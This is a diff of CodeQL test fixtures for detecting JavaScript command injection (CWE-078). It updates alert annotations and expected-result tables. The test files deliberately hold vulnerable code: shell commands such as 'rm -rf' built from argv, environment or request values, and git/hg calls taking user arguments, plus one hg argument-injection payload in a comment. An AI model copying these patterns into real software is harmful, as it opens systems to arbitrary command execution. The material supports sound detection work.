command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | command-line argument | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref index 2911d45d2dac..4367c17e03ee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.qlref @@ -1 +1,2 @@ -Security/CWE-078/IndirectCommandInjection.ql \ No newline at end of file +query: Security/CWE-078/IndirectCommandInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js index 7a8f6982f178..021715395217 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js @@ -1,14 +1,14 @@ import { exec } from "@actions/exec"; import { getInput } from "@actions/core"; -exec(process.env['TEST_DATA']); // NOT OK -exec(process.env['GITHUB_ACTION']); // OK +exec(process.env['TEST_DATA']); // $ Alert +exec(process.env['GITHUB_ACTION']); function test(e) { - exec(e['TEST_DATA']); // NOT OK - exec(e['GITHUB_ACTION']); // OK + exec(e['TEST_DATA']); // $ Alert + exec(e['GITHUB_ACTION']); } -test(process.env); +test(process.env); // $ Source -exec(getInput('data')); // NOT OK +exec(getInput('data')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js index 17b8b6c9c25e..fe5142a0b3c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js @@ -1,95 +1,95 @@ var cp = require("child_process"); (function() { - cp.exec(process.argv); // NOT OK (just weird) - cp.exec(process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[1]); // OK - cp.exec("cmd.sh " + process.argv[2]); // NOT OK + cp.exec(process.argv); // $ Alert - just weird + cp.exec(process.argv[0]); + cp.exec("cmd.sh " + process.argv[0]); + cp.exec("cmd.sh " + process.argv[1]); + cp.exec("cmd.sh " + process.argv[2]); // $ Alert - var args = process.argv.slice(2); - cp.execSync(args[0]); // NOT OK - cp.execSync("cmd.sh " + args[0]); // NOT OK + var args = process.argv.slice(2); // $ Source + cp.execSync(args[0]); // $ Alert + cp.execSync("cmd.sh " + args[0]); // $ Alert var fewerArgs = args.slice(1); - cp.execSync(fewerArgs[0]); // NOT OK - cp.execSync("cmd.sh " + fewerArgs[0]); // NOT OK + cp.execSync(fewerArgs[0]); // $ Alert + cp.execSync("cmd.sh " + fewerArgs[0]); // $ Alert var arg0 = fewerArgs[0]; - cp.execSync(arg0); // NOT OK - cp.execSync("cmd.sh " + arg0); // NOT OK + cp.execSync(arg0); // $ Alert + cp.execSync("cmd.sh " + arg0); // $ Alert }); (function() { - const args = process.argv.slice(2); + const args = process.argv.slice(2); // $ Source const script = path.join(packageDir, 'app', 'index.js'); - cp.execSync(`node ${script} ${args[0]} --option"`); // NOT OK - cp.execSync(`node ${script} ${args.join(' ')} --option"`); // NOT OK + cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert + cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert }); -cp.exec("cmd.sh " + require("get-them-args")().foo); // NOT OK +cp.exec("cmd.sh " + require("get-them-args")().foo); // $ Alert cp.exec("cmd.sh " + require("minimist")().foo); // OK - no args provided. -cp.exec("cmd.sh " + require("yargs").argv.foo); // NOT OK -cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK +cp.exec("cmd.sh " + require("yargs").argv.foo); // $ Alert +cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { var args = require('yargs') // eslint-disable-line .command('serve [port]', 'start the server', (yargs) => { }) .option('verbose', { foo: "bar" }) - .argv + .argv // $ Source - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert - cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // NOT OK + cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // $ Alert }); (function () { const { argv: { ...args - }, + }, // $ Source } = require('yargs') .usage('Usage: foo bar') .command(); - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert - var tainted1 = require('yargs').argv; - var tainted2 = require('yargs').parse() + var tainted1 = require('yargs').argv; // $ Source + var tainted2 = require('yargs').parse() // $ Source const {taint1: {...taint1rest},taint2: {...taint2rest}} = { taint1: tainted1, taint2: tainted2 } - cp.exec("cmd.sh " + taint1rest); // NOT OK - has flow from tainted1 - cp.exec("cmd.sh " + taint2rest); // NOT OK - has flow from tianted2 + cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1 + cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2 - var {...taint3} = require('yargs').argv; - cp.exec("cmd.sh " + taint3); // NOT OK + var {...taint3} = require('yargs').argv; // $ Source + cp.exec("cmd.sh " + taint3); // $ Alert - var [...taint4] = require('yargs').argv; - cp.exec("cmd.sh " + taint4); // NOT OK + var [...taint4] = require('yargs').argv; // $ Source + cp.exec("cmd.sh " + taint4); // $ Alert }); (function () { - const argv = process.argv.slice(2); + const argv = process.argv.slice(2); // $ Source var minimist = require("minimist"); - cp.exec("cmd.sh " + minimist(argv).foo); // NOT OK + cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert var subarg = require('subarg'); - cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // $ Alert var yargsParser = require('yargs-parser'); - cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert import args from 'args' - var flags = args.parse(process.argv); - cp.exec("cmd.sh " + flags.foo); // NOT OK + var flags = args.parse(process.argv); // $ Source + cp.exec("cmd.sh " + flags.foo); // $ Alert - var flags = require('arg')({...spec}); - cp.exec("cmd.sh " + flags.foo); // NOT OK + var flags = require('arg')({...spec}); // $ Source + cp.exec("cmd.sh " + flags.foo); // $ Alert }) (function () { @@ -99,42 +99,42 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK parser.add_argument('-f', '--foo', { help: 'foo bar' }); - cp.exec("cmd.sh " + parser.parse_args().foo); // NOT OK + cp.exec("cmd.sh " + parser.parse_args().foo); // $ Alert }); (function () { const commandLineArgs = require('command-line-args'); - const options = commandLineArgs(optionDefinitions); - cp.exec("cmd.sh " + options.foo); // NOT OK + const options = commandLineArgs(optionDefinitions); // $ Source + cp.exec("cmd.sh " + options.foo); // $ Alert }); (function () { const meow = require('meow'); - const cli = meow(`helpstring`, {flags: {...flags}}); + const cli = meow(`helpstring`, {flags: {...flags}}); // $ Source - cp.exec("cmd.sh " + cli.input[0]); // NOT OK + cp.exec("cmd.sh " + cli.input[0]); // $ Alert }); (function () { var dashdash = require('dashdash'); - var opts = dashdash.parse({options: options}); + var opts = dashdash.parse({options: options}); // $ Source - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert var parser = dashdash.createParser({options: options}); - var opts = parser.parse(); + var opts = parser.parse(); // $ Source - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert }); (function () { - const { program } = require('commander'); + const { program } = require('commander'); // $ Source program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert }); (function () { @@ -142,8 +142,8 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK const program = new Command(); program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert - cp.execFile(program.opts().pizzaType, ["foo", "bar"]); // OK + cp.execFile(program.opts().pizzaType, ["foo", "bar"]); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected index e449f163d463..e4396669dc85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected @@ -1,3 +1,21 @@ +#select +| second-order.js:7:33:7:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:7:33:7:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:9:29:9:34 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:9:29:9:34 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:11:33:11:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:11:33:11:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:15:19:15:24 | myArgs | second-order.js:13:18:13:31 | req.query.args | second-order.js:15:19:15:24 | myArgs | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:13:18:13:31 | req.query.args | a user-provided value | +| second-order.js:26:35:26:40 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:26:35:26:40 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:29:19:29:32 | req.query.args | a user-provided value | +| second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:40:28:40:43 | req.query.remote | a user-provided value | +| second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:42:31:42:46 | req.query.remote | a user-provided value | +| second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:44:18:44:31 | req.query.args | a user-provided value | +edges +| second-order.js:6:9:6:33 | remote | second-order.js:7:33:7:38 | remote | provenance | | +| second-order.js:6:9:6:33 | remote | second-order.js:9:29:9:34 | remote | provenance | | +| second-order.js:6:9:6:33 | remote | second-order.js:11:33:11:38 | remote | provenance | | +| second-order.js:6:9:6:33 | remote | second-order.js:26:35:26:40 | remote | provenance | | +| second-order.js:6:18:6:33 | req.query.remote | second-order.js:6:9:6:33 | remote | provenance | | +| second-order.js:13:9:13:31 | myArgs | second-order.js:15:19:15:24 | myArgs | provenance | | +| second-order.js:13:18:13:31 | req.query.args | second-order.js:13:9:13:31 | myArgs | provenance | | nodes | second-order.js:6:9:6:33 | remote | semmle.label | remote | | second-order.js:6:18:6:33 | req.query.remote | semmle.label | req.query.remote | @@ -12,22 +30,4 @@ nodes | second-order.js:40:28:40:43 | req.query.remote | semmle.label | req.query.remote | | second-order.js:42:31:42:46 | req.query.remote | semmle.label | req.query.remote | | second-order.js:44:18:44:31 | req.query.args | semmle.label | req.query.args | -edges -| second-order.js:6:9:6:33 | remote | second-order.js:7:33:7:38 | remote | provenance | | -| second-order.js:6:9:6:33 | remote | second-order.js:9:29:9:34 | remote | provenance | | -| second-order.js:6:9:6:33 | remote | second-order.js:11:33:11:38 | remote | provenance | | -| second-order.js:6:9:6:33 | remote | second-order.js:26:35:26:40 | remote | provenance | | -| second-order.js:6:18:6:33 | req.query.remote | second-order.js:6:9:6:33 | remote | provenance | | -| second-order.js:13:9:13:31 | myArgs | second-order.js:15:19:15:24 | myArgs | provenance | | -| second-order.js:13:18:13:31 | req.query.args | second-order.js:13:9:13:31 | myArgs | provenance | | subpaths -#select -| second-order.js:7:33:7:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:7:33:7:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:9:29:9:34 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:9:29:9:34 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:11:33:11:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:11:33:11:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:15:19:15:24 | myArgs | second-order.js:13:18:13:31 | req.query.args | second-order.js:15:19:15:24 | myArgs | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:13:18:13:31 | req.query.args | a user-provided value | -| second-order.js:26:35:26:40 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:26:35:26:40 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:29:19:29:32 | req.query.args | a user-provided value | -| second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:40:28:40:43 | req.query.remote | a user-provided value | -| second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:42:31:42:46 | req.query.remote | a user-provided value | -| second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:44:18:44:31 | req.query.args | a user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref index 00961f212e74..b6f6625a0e76 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref @@ -1 +1,2 @@ -Security/CWE-078/SecondOrderCommandInjection.ql \ No newline at end of file +query: Security/CWE-078/SecondOrderCommandInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js index f68093d24053..b49d6b2bd73b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js @@ -3,19 +3,19 @@ const app = express(); const { execFile } = require("child_process"); app.get("/", (req, res) => { - const remote = req.query.remote; - execFile("git", ["ls-remote", remote]); // NOT OK + const remote = req.query.remote; // $ Source + execFile("git", ["ls-remote", remote]); // $ Alert - execFile("git", ["fetch", remote]); // NOT OK + execFile("git", ["fetch", remote]); // $ Alert - indirect("git", ["ls-remote", remote]); // NOT OK + indirect("git", ["ls-remote", remote]); // $ Alert - const myArgs = req.query.args; + const myArgs = req.query.args; // $ Source - execFile("git", myArgs); // NOT OK + execFile("git", myArgs); // $ Alert if (remote.startsWith("--")) { - execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. + execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. } else { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's not an option } @@ -23,10 +23,10 @@ app.get("/", (req, res) => { if (remote.startsWith("git@")) { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's a git URL } else { - execFile("git", ["ls-remote", remote, "HEAD"]); // NOT OK - unknown starting string + execFile("git", ["ls-remote", remote, "HEAD"]); // $ Alert - unknown starting string } - execFile("git", req.query.args); // NOT OK - unknown args + execFile("git", req.query.args); // $ Alert - unknown args execFile("git", ["add", req.query.args]); // OK - git add is not a command that can be used to execute arbitrary code @@ -34,16 +34,16 @@ app.get("/", (req, res) => { execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs)); // NOT OK - but not found [INCONSISTENCY]. It's hard to track through concat. - execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // OK + execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // hg - execFile("hg", ["clone", req.query.remote]); // NOT OK + execFile("hg", ["clone", req.query.remote]); // $ Alert - execFile("hg", ["whatever", req.query.remote]); // NOT OK - `--config=alias.whatever=touch pwned` + execFile("hg", ["whatever", req.query.remote]); // $ Alert - `--config=alias.whatever=touch pwned` - execFile("hg", req.query.args); // NOT OK - unknown args + execFile("hg", req.query.args); // $ Alert - unknown args - execFile("hg", ["clone", "--", req.query.remote]); // OK + execFile("hg", ["clone", "--", req.query.remote]); }); function indirect(cmd, args) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref index ee13f263562a..b9f570b25eee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref @@ -1 +1,2 @@ -Security/CWE-078/ShellCommandInjectionFromEnvironment.ql \ No newline at end of file +query: Security/CWE-078/ShellCommandInjectionFromEnvironment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js index 0d610b1e9dd3..0a0edcbd25c7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js @@ -2,12 +2,12 @@ var cp = require('child_process'), path = require('path'), execa = require("execa"); (function() { - cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); // GOOD - cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // BAD + cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); + cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert - execa.shell('rm -rf ' + path.join(__dirname, "temp")); // NOT OK - execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // NOT OK + execa.shell('rm -rf ' + path.join(__dirname, "temp")); // $ Alert + execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert const safe = "\"" + path.join(__dirname, "temp") + "\""; - execa.shellSync('rm -rf ' + safe); // OK + execa.shellSync('rm -rf ' + safe); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected index 482c3cfff1b4..c4b16b01a38f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected @@ -1,8 +1,115 @@ +#select +| lib/isImported.js:6:10:6:25 | "rm -rf " + name | lib/isImported.js:5:49:5:52 | name | lib/isImported.js:6:22:6:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/isImported.js:5:49:5:52 | name | library input | lib/isImported.js:6:2:6:26 | cp.exec ... + name) | shell command | +| lib/lib2.js:4:10:4:25 | "rm -rf " + name | lib/lib2.js:3:28:3:31 | name | lib/lib2.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:3:28:3:31 | name | library input | lib/lib2.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/lib2.js:8:10:8:25 | "rm -rf " + name | lib/lib2.js:7:32:7:35 | name | lib/lib2.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:7:32:7:35 | name | library input | lib/lib2.js:8:2:8:26 | cp.exec ... + name) | shell command | +| lib/lib.js:4:10:4:25 | "rm -rf " + name | lib/lib.js:3:33:3:36 | name | lib/lib.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:3:33:3:36 | name | library input | lib/lib.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/lib.js:11:10:11:25 | "rm -rf " + name | lib/lib.js:10:32:10:35 | name | lib/lib.js:11:22:11:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:10:32:10:35 | name | library input | lib/lib.js:11:2:11:26 | cp.exec ... + name) | shell command | +| lib/lib.js:15:10:15:25 | "rm -rf " + name | lib/lib.js:14:36:14:39 | name | lib/lib.js:15:22:15:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:14:36:14:39 | name | library input | lib/lib.js:15:2:15:26 | cp.exec ... + name) | shell command | +| lib/lib.js:20:10:20:25 | "rm -rf " + name | lib/lib.js:19:34:19:37 | name | lib/lib.js:20:22:20:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:19:34:19:37 | name | library input | lib/lib.js:20:2:20:26 | cp.exec ... + name) | shell command | +| lib/lib.js:27:10:27:25 | "rm -rf " + name | lib/lib.js:26:35:26:38 | name | lib/lib.js:27:22:27:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:26:35:26:38 | name | library input | lib/lib.js:27:2:27:26 | cp.exec ... + name) | shell command | +| lib/lib.js:35:11:35:26 | "rm -rf " + name | lib/lib.js:34:14:34:17 | name | lib/lib.js:35:23:35:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:34:14:34:17 | name | library input | lib/lib.js:35:3:35:27 | cp.exec ... + name) | shell command | +| lib/lib.js:38:11:38:26 | "rm -rf " + name | lib/lib.js:37:13:37:16 | name | lib/lib.js:38:23:38:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:37:13:37:16 | name | library input | lib/lib.js:38:3:38:27 | cp.exec ... + name) | shell command | +| lib/lib.js:41:11:41:26 | "rm -rf " + name | lib/lib.js:40:6:40:9 | name | lib/lib.js:41:23:41:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:40:6:40:9 | name | library input | lib/lib.js:41:3:41:27 | cp.exec ... + name) | shell command | +| lib/lib.js:50:35:50:50 | "rm -rf " + name | lib/lib.js:49:31:49:34 | name | lib/lib.js:50:47:50:50 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:49:31:49:34 | name | library input | lib/lib.js:50:2:50:51 | require ... + name) | shell command | +| lib/lib.js:54:13:54:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:54:25:54:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:55:2:55:14 | cp.exec(cmd1) | shell command | +| lib/lib.js:57:13:57:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:57:25:57:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:59:3:59:14 | cp.exec(cmd) | shell command | +| lib/lib.js:65:10:65:25 | "rm -rf " + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:65:2:65:26 | cp.exec ... + name) | shell command | +| lib/lib.js:69:10:69:47 | "for fo ... la end" | lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:69:2:69:48 | cp.exec ... a end") | shell command | +| lib/lib.js:71:10:71:31 | "cat /f ... + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:71:2:71:32 | cp.exec ... + name) | shell command | +| lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | lib/lib.js:64:41:64:44 | name | lib/lib.js:73:21:73:24 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | shell command | +| lib/lib.js:75:10:75:29 | "cat '" + name + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:75:20:75:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:75:2:75:30 | cp.exec ... + "'") | shell command | +| lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:77:28:77:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:77:2:77:38 | cp.exec ... + "'") | shell command | +| lib/lib.js:83:10:83:25 | "rm -rf " + name | lib/lib.js:82:35:82:38 | name | lib/lib.js:83:22:83:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:83:2:83:26 | cp.exec ... + name) | shell command | +| lib/lib.js:86:13:86:16 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:86:13:86:16 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) | shell command | +| lib/lib.js:89:21:89:24 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:89:21:89:24 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) | shell command | +| lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | lib/lib.js:82:35:82:38 | name | lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) | shell command | +| lib/lib.js:98:35:98:38 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:98:35:98:38 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:98:2:98:40 | cp.exec ... name)) | shell command | +| lib/lib.js:100:37:100:40 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:100:37:100:40 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:100:2:100:42 | cp.exec ... name)) | shell command | +| lib/lib.js:102:46:102:49 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:102:46:102:49 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:102:2:102:51 | cp.exec ... name)) | shell command | +| lib/lib.js:108:41:108:44 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:108:41:108:44 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:108:2:108:46 | cp.exec ... name)) | shell command | +| lib/lib.js:112:10:112:25 | "rm -rf " + name | lib/lib.js:111:34:111:37 | name | lib/lib.js:112:22:112:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:111:34:111:37 | name | library input | lib/lib.js:112:2:112:26 | cp.exec ... + name) | shell command | +| lib/lib.js:121:10:121:25 | "rm -rf " + name | 